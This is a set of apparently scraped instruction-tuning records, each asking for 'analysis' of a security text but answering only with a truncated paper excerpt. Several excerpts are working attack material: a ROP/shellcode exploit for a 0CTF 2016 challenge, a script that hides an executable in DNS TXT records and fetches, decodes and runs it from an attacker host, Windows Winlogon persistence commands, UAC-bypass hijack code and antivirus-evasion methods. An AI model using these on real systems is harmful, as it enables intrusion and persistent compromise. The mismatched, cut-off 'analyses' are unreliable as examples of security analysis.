{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/python2 from cStringIO import StringIO from pwn import * def attack(connection): stage2_code = [ \"begin:\", \" mov ebp, 0x08049000\", shellcraft.i386.linux.syscall(\"SYS_alarm\", 0), \"open:\", \" lea ebx, [ebp + suffix - begin - 1]\", \" jmp 1f\", \"0:\", \" mov byte ptr[ebx], 0x30\", \" dec ebx\", \" cmp byte ptr[ebx - 1], 0x39\", \" jg failure\", \"1:\", \" inc byte ptr[ebx]\", \" cmp byte ptr[ebx], 0x39\", \" jg 0b\", \" lea ebx, [ebp + pathname - begin]\", shellcraft.i386.linux.syscall(\"SYS_open\", \"ebx\", constants.O_RDONLY), \" cmp eax, 0\", \" jl open\", \" lea ecx, [ebp + buffer - begin]\", shellcraft.i386.linux.syscall(\"SYS_read\", \"eax\", \"ecx\", 0x100), \"failure:\", shellcraft.i386.linux.syscall(\"SYS_write\", 1, \"ebp\", 0x200), shellcraft.i386.linux.syscall(\"SYS_exit\", 0), \"pathname:\", \" .ascii \\\"/proc/self/task//////\\\"\", \"suffix:\", \" .asciz \\\"/root/home/sandbox/flag\\\"\", \"buffer:\", ] stage2 = asm(\"\\n\".join(stage2_code), arch = \"i386\", os = \"linux\") buffer = StringIO() buffer.write(p32(0x0804811d)) # sys_read buffer.write(p32(0x080481b8)) # add esp, 0x30 ; ret buffer.write(p32(0)) # fd buffer.write(p32(0x08049000)) # buffer buffer.write(p32(len(stage2))) # size buffer.write(\"A\" * 0x24) buffer.write(p32(0x08048135)) # sys_write buffer.write(p32(0x080481b8)) # add esp, 0x30 ; ret buffer.write(p32(1)) # fd buffer.write(p32(0x08049000)) # buffer buffer.write(p32(constants.linux.i386.SYS_mprotect)) # size buffer.write(\"A\" * 0x24) buffer.write(p32(0x08048122)) # syscall buffer.write(p32(0x08049000)) # stage2 buffer.write(p32(0x08049000)) # buffer buffer.write(p32(len(stage2))) # size buffer.write(p32(constants.linux.PROT_READ | constants.linux.PROT_WRITE | constants.linux.PROT_EXEC)) stage1 = buffer.getvalue() for offset in reversed(range(4, len(stage1), 0x10)): connection.recvuntil(\"Welcome to 0CTF 2016!\\n\") buffer = StringIO() buffer.write(\"A\" * 0x20) if offset == 4: buffer.write(stage1[: offset + 0x10]) else: buffer.write(p32(0x080480d8)) # start buffer.write(stage1[offset: offset + 0x10]) p", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFluX on: E.A.S. (Emergency Alert System) Presented By: Matt Krick, DCFluX Chief Engineer, New West Broadcasting Systems, Inc. DEF CON 16 Las Vegas, NV Track 2, 12:00-12:50, Saturday, August 9, 2008 WARNING: Shut down all transmitters with active microphones in the room. Do not re-transmit Hot audio. Saturday Night Live, TV Funhouse, Fun With Real Audio 1997 by NBC, Inc. About the Author  Matt Krick  DCFluX  Video Editor  Broadcast Engineer  1998 to Present  K3MK  Licensed to Transmit, 1994 to Present Video Advantage 2002 by Media Concepts, Inc. Warning Systems 1. CONELRAD 2. EBS 3. EAS 4. EAS: The Next Generation 1. CONtrol of ELectromagnetic RADiation  1951 - 1963  All FM, TV and most AM stations sign-off  Some AM stations required to broadcast on 640 kHz or 1240 kHz  All radios marked with CONELRAD indicators on frequency dials  Carrier on and off in 5 second intervals  1000 Hz alert tone for 20 - 25 seconds 1. CONtrol of ELectromagnetic RADiation Photo by: Trevor Paglen Department of Geography, University of California at Berkeley 1. CONtrol of ELectromagnetic RADiation  CONELRAD Stress Test  Transmitter power supply failure  Local electrical substation failure  Transmitter output network failure  Transmitter carrier tube failure  Transmitter modulator tube failure  1963 - 1997  Introduction of Two-Tone alert  853 & 960 Hz for 20 - 25 seconds  Required 24 / 7 manned stations to relay alerts 2. Emergency Broadcast System 2. Emergency Broadcast System  EBS Stress Test  Transmitter power supply failure  Local electrical substation failure  Transmitter modulator tube failure 3. Emergency Alert System  1997 - Present (1994)  Administered by FEMA, FCC & NOAA  Introduction of SAME encoded digital message headers  EAS uses 853 & 960 Hz Alert Tone  SAME uses 1050 Hz Alert Tone  Fully automated 3. Emergency Alert System  Emergency Action Notification (EAN)  Emergency Action Termination (EAT)  National Information Center (NIC)  National Periodic Test (NPT)  NOAA Weather Ale", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nURL跳转奇葩姿势详解 JutaZ 目 录 CONTENT 1 关于我 5 衍生危害 2 URL的标准形式 3 绕过及FUZZ 4 其他跳转方式 一个新手 1 关于我 2 URL的标准形式 scheme://user:password@domain:port/path?query_string#fragments ① 方案名 ② 验证信息 ③ 主机名 ④ 端口号 ⑤ 路径 ⑥ 查询字符串 ⑦ 片段字串 引自白帽子讲浏览器安全 3 绕过及FUZZ 实现 test.a.com 跳转到 b.com 限制仅允许跳转至*.a.com  a.com.b.com  a.comb.com  b.coma.com  a.com:80@b.com  b.com?a.com  b.com#a.com 3 绕过及FUZZ a. 个性化字典 URLENCODE 字符绕过字典 其他可信域名 等等 b. 其他尝试 CRLF漏洞 反射xss 其他猥琐姿势 4 其他跳转方式 乌云案例一 代码逻辑缺陷 乌云案例二 第三方插件缺陷 4 其他跳转方式 乌云案例三 隐藏极深的跳转 4 其他跳转方式 5 衍生危害 衍生危害一 跳转时传递了cookie等数据 BY:呆子不开口 衍生危害二 客户端伪协议 BY:呆子不开口 5 衍生危害", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Writeup SECCON CTF 2015 Uczestniczyliśmy (cr019283, c7f.m0d3, msm, Rev, other019, nazywam i Shalom) w SECCON CTF 2015, i znowu spróbujemy opisać zadania z którymi walczyliśmy (a przynajmniej te, które pokonaliśmy). ![](results.png) ### Spis treści: * [Start SECCON CTF (Exercises) 50](start_seccon_50) * [SECCON WARS 2015 (Stegano) 100](seccon_wars_100) * [Unzip the file (Crypto) 100] * [Fragment2 (Web/Network) 200] * [Connect the server (Web/Network) 100](connect_web_100) * [Command-Line Quiz (Misc) 100](quiz_100) * [Entry form (Web/Network) 100](entry_form_web_100) * [Bonsai XSS Revolutions (Web/Network) 200](bonsai_xss_revolutions_web_200) * [Exec dmesg (Binary/Reverse) 300] * [Decrypt it (Crypto) 300] * [QR puzzle: Web (Misc) 400](qr_web_400) * [QR puzzle: Nonogram (Misc) 300](qr_nonogram_300) * [QR puzzle: Windows (Unknown) 200](qr_windows_200) * [Reverse-Engineering Android APK 1 (Misc) 400] * [Find the prime numbers (Crypto) 200](paillier_crypto_200) * [Micro computer exploit code challenge (Exploit) 300] * [GDB Remote Debugging (Binary/Reverse) 200] * [FSB: TreeWalker (Exploit) 200] * [Steganography 1 (Stegano) 100](stegano_1_100) * [Steganography 2 (Stegano) 100] * [Steganography 3 (Stegano) 100](stegano_3_100) * [4042 (Misc/Crypto) 100](4042_crypto_100) * [Individual Elebin (Binary/Reverse) 200] * [Last Challenge (Thank you for playing) (Exercises/Crypto) 50](last_crypto_50)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHardware Black Magic: Designing Printed Circuit Boards Dr. Fouad (Dr. K) Kiamilev Corey (c0re) Lange Stephen (afterburn) Janansky Who are we?  University of Delaware  Department of Electrical and Computer Engineering  CVORG Who are we?  Dr. Fouad Kiamilev  Professor  Fearless Leader  Procurer of Funding Who are we?  Corey Lange  Grad Student  Geek  Eternally Grateful for Aforementioned Funding Who are we?  Stephen Janansky  Researcher  Hardware Hacker  Embedded Systems Designer  Network Engineer What we are doing here?  Printed Circuit Board (PCB) Design  Its easy!  Its fun!  It will let everyone you know how much of a nerd you really are! But what is a PCB?  Layers of dielectric and metal  Usually copper and FR4  Anywhere from 2 to 20  A means to layout circuits  Prototype vs. Production What to do with Cu?  Create electrical connections between components  Traces/Tracks  Pours/Planes  Need to use vias to connect layers Whats a via?  Plated hole going through the board that connects the layers together  Yes, all of the layers (be careful!)  Well, not always...  Blind Vias  Buried Vias Components  A circuit without components is like...  A bird without wings  A car without wheels  A grad student without funding Components  A collection of pads or vias that a chip or discrete part will connect to the board  a.k.a. Footprint Datasheets: Who cares?  We do!  Shows lots of valuable information:  Electrical specifications  Usual applications/schematics  Footprint sizes What happens when you dont listen to the datasheet: Design Rules  If you design it, they still might not be able to fab it.  Machines are only so precise  Smaller == $$$  Allow for tolerances  Design Rule Check (DRC) is a must!!!! The Finishing Touches Soldermask Plating metal Silkscreen Secrets of the Pros  When in doubt, make the pad/via/ through-hole bigger than you think it should be  Through Hole ROT: +0.010 to diameter  Will allow more room to solder or allow for an better fit  Use 1:1 printouts to make", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1.1 1.2 1.3 1.4 1.5 1.6 1.7 1.8 1.9 1.10 1.11 1.12 1.13 1.14 1.15 1.16 1.17 1.18 1.19 1.20 1.21 TableofContents 引子 第一章BurpSuite安装和环境配置 第二章BurpSuite代理和浏览器设置 第三章如何使用BurpSuite代理 第四章SSL和Proxy高级选项 第五章如何使用BurpTarget 第六章如何使用BurpSpider 第七章如何使用BurpScanner 第八章如何使用BurpIntruder 第九章如何使用BurpRepeater 第十章如何使用BurpSequencer 第十一章如何使用BurpDecoder 第十二章如何使用BurpComparer 第十三章数据查找和拓展功能的使用 第十四章BurpSuite全局参数设置和使用 第十五章BurpSuite应用商店插件的使用 第十六章如何编写自己的BurpSuite插件 第十七章使用BurpSuite测试WebServices服务 第十八章使用Burp,Sqlmap进行自动化SQL注入渗透测试 第十九章使用BurpPhantomJS进行XSS检测 第二十章使用BurpAndroidKiller进行安卓app渗透测试 1 BurpSuite实战指南 引子 刚接触web安全的时候非常想找到一款集成型的渗透测试工具找来找去最终选择了 BurpSuite除了它功能强大之外还有就是好用易于上手于是就从网上下载了一个破解 版的来用记得那时候好像是1.2版本功能也没有现在这么强大在使用的过程中慢慢发 现网上系统全量的介绍BurpSuite的书籍太少了大多是零星片段的讲解不成体系后 来慢慢地出现了不少介绍BurpSuite的视频现状也变得越来越好但每每遇到不知道的问题 时还是不得不搜寻BurpSuite的官方文档和英文网页来解决问题也正是这些问题慢慢让 我觉得有必要整理一套全面的BurpSuite中文教程算是为web安全界做尽自己的一份微薄之 力也才有了你们现在看到的这一系列文章 我给这些文章取了IT行业图书比较通用的名称:BurpSuite实战指南您可以称我为中文编 写者文章中的内容主要源于BurpSuite官方文档和多位国外安全大牛的经验总结我只是在 他们的基础上结合我的经验理解和实践编写成现在的中文教程本书我也没有出版成 纸质图书的计划本着IT人互联分享的精神放在github做免费的电子书于业界算一份 小小的贡献于自己算一次总结和锻炼 以上是为小记 感谢您阅读此书阅读过程中如果发现错误的地方欢迎发送邮件到t0data@hotmail.com, 感谢您的批评指正 本书包含以下章节内容 第一部分BurpSuite基础 1. BurpSuite安装和环境配置 2. BurpSuite代理和浏览器设置 3. 如何使用BurpSuite代理 4. SSL和Proxy高级选项 5. 如何使用BurpTarget 6. 如何使用BurpSpider 7. 如何使用BurpScanner 8. 如何使用BurpIntruder 9. 如何使用BurpRepeater 10. 如何使用BurpSequencer 11. 如何使用BurpDecoder 引子 2 12. 如何使用BurpComparer 第二部分BurpSuite高级 1. 数据查找和拓展功能的使用 2. BurpSuite全局参数设置和使用 3. BurpSuite应用商店插件的使用 4. 如何编写自己的BurpSuite插件 第三部分BurpSuite综合使用 1. 使用BurpSuite测试WebServices服务 2. 使用Burp,Sqlmap进行自动化SQL注入渗透测试 3. 使用BurpPhantomJS进行XSS检测 4. 使用BurpAndroidKiller进行安卓app渗透测试 引子 3 第一章BurpSuite安装和环境配置 BurpSuite是一个集成化的渗透测试工具它集合了多种渗透测试组件使我们自动化地或手 工地能更好的完成对web应用的渗透测试和攻击在渗透测试中我们使用BurpSuite将使得 测试工作变得更加容易和方便即使在不需要娴熟的技巧的情况下只有我们熟悉BurpSuite 的使用也使得渗透测试工作变得轻松和高效 BurpSuite是由Java语言编写而成而Java自身的跨平台性使得软件的学习和使用更加方 便BurpSuite不像其他的自动化测试工具它需要你手工的去配置一些参数触发一些自动 化流程然后它才会开始工作 BurpSuite可执行程序是java文件类型的jar文件免费版的可以从免费版下载地址进行下载 免费版的BurpSuite会有许多限制很多的高级工具无法", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@patrickwardle DLL Hijacking on OS X? #@%& Yeah! leverages the best combination of humans and technology to discover security vulnerabilities in our customers web apps, mobile apps, and infrastructure endpoints WHOIS @patrickwardle always looking for more experts! implants backdoor remotely accessible means of providing secret control of device injection coercing a process to load a module persistent malicious code hooking intercepting function calls trojan malicious code that masquerades as legitimate gotta make sure were all on the same page ;) SOME DEFINITIONS what we'll be covering OUTLINE history of dll hijacking dylib hijacking attacks & defenses } hijacking finding hijackables loader/linker features HISTORY OF DLL HIJACKING on windows an overview DLL HIJACKING (WINDOWS) an attack that exploits the way some Windows applications search and load Dynamic Link Libraries (DLLs) definition \"binary planting\" \"insecure library loading\" \"dll loading hijacking\" \"dll preloading attack\" other names <blah>.dll <blah>.dll \"I need <blah>.dll\" cwd providing a variety of attack scenarios DLL HIJACKING ATTACKS vulnerable binary persistence process injection escalation of privileges (uac bypass) remote infection } in the wild DLL HIJACKING ATTACKS //paths to abuse char* uacTargetDir[] = {\"system32\\\\sysprep\", \"ehome\"}; char* uacTargetApp[] = {\"sysprep.exe\", \"mcx2prov.exe\"}; char* uacTargetDll[] = { \"cryptbase.dll\" , \"CRYPTSP.dll\"}; //execute vulnerable application & perform DLL hijacking attack if(Exec(&exitCode, \"cmd.exe /C %s\", targetPath)) { if(exitCode == UAC_BYPASS_MAGIC_RETURN_CODE) DBG(\"UAC BYPASS SUCCESS\") ... bypassing UAC (carberp, blackbeard, etc.) we had a plump stack of malware samples in our library that all had this name (fxsst.dll) and were completely unrelated to each other -mandiant persistence priv esc the current state of affairs DLL HIJACKING 2010 today M$oft Security Advisory 2269637 & Dynamic-Link Library Security doc Any OS which allows for dynamic linking ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRedteaming主流杀软对抗之路 ABOUT ME 安全研究员 红队攻防杀软规避研究及武器化它们 木星安全实验室 实验室负责人 CompTIA Security+ CISP-PTS CISAW CISP CDPSE 红队作战概览图 研究背景 红队攻防的必要因素 杀软检测手段的不断升级 目录 静态免杀 动态免杀 自我保护 Bypass之静态免杀 Shellcode加密 IAT导入地址表 混淆编译 Shellcode加密 Shellcode16进制的机器码 例如 杀软查杀cobaltstrike, metasploit等知名远控 通常是通过shellcode特征匹配来进行查杀 内存加载mimikatz通常也会将mimikatz转为 shellcode Shellcode加密 栅栏密码加密 IAT导入地址表 在PE结构中存在一个IAT导入表导入表中声明了这 个PE文件会使用哪些API函数  定义MyAlloc函数指针  定义MyProtect函数指针 IAT导入地址表 动态调用 IAT导入地址表 未处理 处理后 混淆编译 ADVobfuscator https://github.com/andrivet/ADVobfuscator ADVobfuscator在编译时使用C语言生成混淆代码它引入了某种形式的机制 以生成多态代码例如字符串文字的加密和使用有限状态机的调用混淆 混淆编译 ADVobfuscator效果对比1 混淆编译 ADVobfuscator效果对比2 最终效果 Bypass之行为免杀 Api执行链 延时 系统调用 API执行链 VirtualAllocEx WriteProcessMemory URLDownloadToFile ShellExecute 文件下载 申请内存并写入  启发式扫描是通过分析指令出现的顺序或 组合情况来决定文件是否恶意 API执行链 Api间穿插其他干扰性操作 延时 模拟运算 使用素数计算模拟延时 行为免杀测试 遍历ntdll.dll的导出函数找到操作码 使用我们的系统调用函数 系统调用 AV/EDR hook AV / EDR解决方案通常会钩挂用户级Windows API 以便确定所执行的代码是否为恶意代码 系统调用 Windows OS体系结构 系统调用 HellsGate读取在主机上的ntdll.dll动态找到系统调用然后从自己的自定义实现中调用syscall  原从内存读取ntdll.dll用于查找和映射系统调用  现从磁盘读取ntdll.dll用于查找和映射系统调用 系统调用 HellsGate 创建具有相同结构的系统调用函数 寻找syscall操作码并将我们的自定义函数指向它们 http://undocumented.ntinternals.net https://github.com/jthuraisamy/SysWhispers 系统调用 HellsGate 遍历ntdll.dll的导出函数找到操作码 使用我们的系统调用函数 行为免杀测试 遍历ntdll.dll的导出函数找到操作码 使用我们的系统调用函数 自我保护 自我保护 DACL任意访问控制列表 DACL:定义用户或用户所属的组访问该对象的权限 对象可以是文件进程事件或具有安全描述符的任 何其他内容 自我保护  通过设置DACL标志位创建一个用户权限无法 结束的进程 自我保护 AdjustTokenPrivileges此函数启用或禁用指定访问令牌中的特权几乎所有需要令 牌操作的特权操作都使用此API函数 RtlSetDaclSecurityDescriptor函数设置绝对格式安全描述符的DACL信息或者如果 安全描述符中已经存在DACL则将其取代 自我保护 TerminateProcess终止指定进程及其所有的线程 https://github.com/EgeBalci/Hook_API 使用hook_api内联汇编挂钩Windows API函数TerminateProcess 自我保护 CreateremoteThread进程注入 将shellcode注入到可能会带来麻烦的进程中在目标进程中HOOK关键API 自我保护测试 遍历ntdll.dll的导出函数找到操作码 使用我们的系统调用函数", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n致远OA漏洞分析 hw已经开始2天啦期间爆出不少漏洞这也是个不错的学习机会可以学下佬的挖洞姿势 看到致远OA出现了漏洞随笔写下分析章经典的组合漏洞其实只要进了后台还是有个法可以拿到shell的 本机环境: Windows 10 Mysql 5.5.37 S1 V1.9.5/Seeyon A8+/V7.0 SP1 .任意账户登陆分析 根据互联上的POC来看漏洞在 /thirdpartyController.do\" 且method为 access . 根据xml配置件确定 thirdpartyController.do 对应类为 com.seeyon.ctp.portal.sso.thirdpartyintegration.controller.ThirdpartyController 漏洞分析: 主要问题在于enc参数的加解密上 if (request.getParameter(\"enc\") != null) { enc = LightWeightEncoder.decodeString(request.getParameter(\"enc\").replaceAll(\" \", \"+\")); } else { String transcode = URLDecoder.decode(request.getQueryString().split(\"enc=\")[1]); enc = (request.getQueryString().indexOf(\"enc=\") > 0) ? LightWeightEncoder.decodeString(transcode) : null; } if (enc == null) { mv.addObject(\"ExceptionKey\", \"mail.read.alert.wuxiao\"); return mv; } 如果enc参数的值不为空则进 LightWeightEncoder.decodeString 进解密 这切 LightWeightEncoder 类 定义了两个法 encodeString 和 decodeString .及加密/解密也就是说在enc不为空条件下将其内容传 decodeString 法进解密 加解密的规则是将字符通过 toCharArray() 法转换为字符数组 然后通过for循环将每个字符的char值上加 如: abcd => char() 97 98 99 100 转换后为: char() 98 99 100 101 => bcde 最后返回base64编码过后的内容 回到 thirdpartyController.do 中看 enc 解密过后的内容进了哪些操作 Map<String,String> encMap = new HashMap<String, String>(); String[] enc0 = enc.split(\"[&]\"); for (String enc1 : enc0) { String[] enc2 = enc1.split(\"[=]\"); if (enc2 != null) { String key = enc2[0]; String value = (enc2.length == 2) ? enc2[1] : null; if (null != value) { value = URLEncoder.encode(value); value = value.replaceAll(\"%3F\", \"\"); value = URLDecoder.decode(value); } encMap.put(key, value); } } 先创建了个 HashMap 然后将enc的内容以 & 进分割在以 = 分割出 key 和 value .后写encMap中 也就是说 test=123 分割后 key:test value:123  继续往下 String linkType = encMap.get(\"L\"); //取L键指 String path = encMap.get(\"P\"); //取P键指 if (Strings.isNotBlank(linkType))//次判空 { String startTimeStr = \"0\";//默认值 if (encMap.containsKey(\"T\")) { startTimeStr = encMap.get(\"T\");//取T键值 startTimeStr = startTimeStr.trim(); } Long timeStamp = Long.valueOf(0L); if (NumberUtils.isNumber(startTimeStr)) { timeStamp = Long.val", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe future frontier of Hacking - UMTS mobile phone platform Web intrusions: the best indicator of the vulnerable status of the Internet Speaker: SyS64738 www.zone-h.org Zone-H.org Zone-H.org Zone-H.org: the Internet thermometer? Zone-H.org SECURE HACKABLE F#CKABLE Digital attacks amount since 2002 1600 1811 2341 3652 3907 3468 4175 5279 9884 14575 12739 16393 16724 15638 16924 17329 25273 0 5000 10000 15000 20000 25000 30000 2002- 01 2002- 02 2002- 03 2002- 04 2002- 05 2002- 06 2002- 07 2002- 08 2002- 09 2002- 10 2002- 11 2002- 12 2003- 01 2003- 02 2003- 03 2003- 04 2003- 05 Date Digital attacks amount Zone-H.org attacks techniques and tools Zone-H.org 2003 top used vulnerabilities by attackers -Webdav - Samba -Frontpage extensions - Php nuke -Openssl Zone-H.org Defacement reasons 0 2000 4000 6000 8000 10000 12000 2002- 07 2002- 08 2002- 09 2002- 10 2002- 11 2002- 12 2003- 01 2003- 02 2003- 03 2003- 04 2003- 05 For fun Revenge Political Challenge Wannabe Patriotism Zone-H.org Defacements by OS 0 5000 10000 15000 20000 25000 2002-01 2002-02 2002-03 2002-04 2002-05 2002-06 2002-07 2002-08 2002-09 2002-10 2002-11 2002-12 2003-01 2003-02 2003-03 2003-04 2003-05 Win98/NT Win2K WinXP/.NET/2003 Linux BSD family Solaris family Zone-H.org Defacements by OS (single IP) 0 1000 2000 3000 4000 5000 6000 7000 2002-01 2002-02 2002-03 2002-04 2002-05 2002-06 2002-07 2002-08 2002-09 2002-10 2002-11 2002-12 2003-01 2003-02 2003-03 2003-04 2003-05 Win98/NT Win2K Linux BSD family Solaris family CYBERFIGHTS Kashmir related Iraq war related Code red release related Palestine-Israel related No-Global related Zone-H.org CYBERFIGHTS Kashmir related Iraq war related Code red release related Palestine-Israel related No-Global related Zone-H.org CYBERFIGHTS Kashmir related Iraq war related Code red release related Palestine-Israel related No-Global related Zone-H.org CYBERFIGHTS Kashmir related Iraq war related Code red release related Palestine-Israel related No-Global related Zone-H.org CYBE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAttacking .Net at Runtime By Jonathan McCoy Abstract This paper will introduce a high level attack that can control a live .NET program. This attack is a payload to be deployed after opening a backdoor inside of a target .NET application. Also basic information on delivery methods is included. This paper has a C# implementation of this attack: DotNetSpike Introduction This attack can navigate and control a live program by using the rules of the Runtime system to control other .NET applications. Some rules can be bent, other can be broken. Once access to another programs Runtime is gained almost absolute control is at hand. Most every aspect from Objects to Events can be accessed, and most of the time modified. This allows for simple attacks like changing an Objects values or calling functionality; and more complex attacks like introducing or changing the basic logic of the target can be done with ease. With this level of control the target can be forced to divulge protected information, carry out different functionality and send corrupted signals. This attack will also allow for accessing the code base and Object structure live. This platform can allow an attack to be developed and implemented in a matter of minutes or hours. Once inside of the target program the necessary references can be established, and the full power of .NET can be used. After you have all the keys it can be a matter of changing one variable or introducing one line of code to subvert a program's logic. Access Live .NET Program The first step is to establish a connection inside of your targets Runtime; this is done in a number of ways. This can range from compromising the .NET Framework1 to exploiting a glitch in a specific application. Each method of accessing another applications Runtime has a different impact on stability, foot print and security alerts. Also the method you pick will change what references you get to start with and what if any constraints you would have. The method of access ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n权限维持 简介 Logon Scripts是系统的登录脚本这说个特别法 Logon Scripts能够优先于安全软件执 绕过安全软件对敏感操作的拦截本将具体介绍这个技巧 Logon Scripts法 拦截测试 实际 360 创建会被拦截 wmic ENVIRONMENT create name=\"AnonySec\",username=\"%username%\",VariableValue=\"Logon Scripts!\" 但是 测试 并未拦截 启Logon Scripts 注册表路径HKCU\\Environment 创建字符串键值 UserInitMprLogonScript 键值设置为bat的绝对路径C:\\1.bat 绕过360对wmi调的拦截 由于调WMI会被拦截可以通过powershell实现添加注册表键值启动Logon Scripts代码如 第 1  下 New-ItemProperty \"HKCU:Environment\" UserInitMprLogonScript -value \"C:\\1.bat\" -propertyType string | Out-Null Windows权限维持之WinLogon Windows Logon Process即winlogon.exe)是Windows户登陆程序它处理各种活动例如登 录注销在身份验证期间加载户配置件关闭锁定屏幕等 这种为由注册表管理该注册表定义了在Windows登录期间启动哪些进程 注册表项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell 利过程 Userinit 后程序放 C:\\Windows\\System32\\中修改注册表项 Userinit 这样在Windows重新登录期 间可以同时运这两个可执件userinit.exe 与 logon.exe Shell 同样的将后件 放C:\\Program Files\\Internet Explorer\\中修改注册表项 Shell 系统重新登 录期间同时运这两个可执件explorer.exe 与 logon.exe 命令 第 2  reg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v Shell /d \"explorer.exe,logon.exe\" /f reg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v Userinit /d \"Userinit.exe,logon.exe\" /f 种法结果 第 3", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 解决txt记录写文件的大小限制问题 1.0.1 前言 公众号NOP Team曾经发布一个名为远程下载的通用替代方案|红队攻防文章链接为 https://mp.weixin.qq.com/s/Z1zp7klk--uQ1OnzljNESw这篇文章有个痛点就是不能写入 太大的文件本次tip目的为解决这个痛点 1.0.2 解决思路 由于留给TXT记录的长度最长差不多为65515左右的原因导致通过单词txt记录写入大文件成 为不可能 解决办法就是制造多个txt记录写入文件再进行转换如此一来大文件就可以写入了 具体细节在下面脚本这里就不过多描述因为本来就很水 1.0.3 武器化 dnsWriteFile.py import os import sys def FileWriteExe(): os.system(\"certutil -encode \" + sys.argv[1] + \" base64.txt\") with open(\"base64.txt\", \"r+\") as f1: file = f1.read() txt_domain_name = [\"www0.mydomain.com\"] num, www_num = 0, 0 with open(\"mydomain.com.zone\", \"w\") as f: f.write(\"\"\"$TTL 1D @ IN SOA @ rname.invalid. ( 1 2 3 4 5 6 7 8 9 10 11 12 13 14 html 0 ; serial 1D ; refresh 1H ; retry 1W ; expire 3H ) ; minimum NS @ A 127.0.0.1 AAAA ::1 www IN A 1.1.1.1 www0 IN TXT (\"\"\") str.count(file, \"\\n\") for i in file.split('\\n'): num += 1 if num % 900 == 0 and num != 0: www_num += 1 f.write(\")\\nwww\" + str(www_num) + \" IN TXT (\") txt_domain_name.append(\"www\" + str(www_num) + \".mydomain.co m\") f.write(\"\\\"exec\" + i + \"\\\"\\n\") f.write(\")\") print(\"文件长度 \" + str(len(file))) print(\"文件名字 mydomain.com.zone\") print(\"文件应存放目录 /var/named/mydomain.com.zone\") print(\"请求txt记录域名列表 \", txt_domain_name) print( \"\"\"请执行以下命令:\\n1. for /l %k in (0,1,\"\"\" + str( www_num) + \"\"\") do (cmd /v:on /Q /c \"set a= && set b= && for /f \"tokens=*\" %i in ('nslookup -qt=TXT www%k.mydomain.com your_ip | findstr \"exec\"') do (set a=%i && echo !a:~5,-2!)\" >>C:\\\\helo.txt)\\n2. certutil -dec ode C:\\helo.txt C:\\\\aa.exe && cmd /c C:\\\\aa.exe\"\"\") print(\"提示如果文件较大执行完第一条命令需要等待片刻!\") os.system(\"del base64.txt\") if __name__ == '__main__': print(\"usage : python3 dnsWriteFile exeFile\\nExample: python3 .\\dnsW riteFile.py artifact.exe\\n\") try: FileWriteExe() except: os.system(\"del base64.txt\") print(\"执行失败\") 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 执行该脚本后会生成一个mydomain.com.zone文件按照nop team博主所安装教程 将他放入 /var/named/ 目录下然后重启域名服务 根据自己的需要修改your_ip以及写入路径 这里是空的 (-)ﾉ 这里是空的 (-)ﾉ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIdentifying, Exploring, and Predicting Threats in the Russian Hacker Community Dr. Thomas J. Holt Michigan State University holtt@msu.edu Dr. Max Kilger, Spartan Devils Honeynet Project Dr. Deborah Strumsky, UNC-Charlotte Dr. Olga Smirnova, Eastern Carolina University Copyright 2009, all references to this work must appropriately cite the authors. Malware and Hacking  The problem of malware and computer based theft is increasing and becoming more complex  The number of unique keyloggers and malware identified by the apwg have increased during 2008  CSI/FBI reports that businesses lost over $21 million due to fraud, as well as over $10 million due to various malicious software infections  The Department of Justice argues that it is now more profitable to engage in computer crime than drug trafficking Criminological Research  Social science research has explored the malware and hacking community to some degree  Hackers and malware writers operate within a technology focused subculture that values skill and ability  They have relatively loose connections, and sometimes work in teams to create programs or hack systems  Few systematic examinations of the malware and hacker community have examined social ties and interests  Generally no predictive research has been conducted On-line Resources  The malware and hacking community utilize on-line resources that can be actively mined for information  This study will examine the social networks of the malware and hacking community in Russia and Eastern Europe using data generated from social networking blogs  Blogs provide important information on:  Current and emerging threats  The relationships and behavior of attackers  Locations, attitudes, beliefs Self-Report Information  Each LJ profile allows users to provide information on their:  Location  Education  Biographies sometimes provide useful information on psychological status of the user or whether the journal is friends-only  Interests can include political affiliation, g", "category": "text_analysis", "source": "security_papers"}
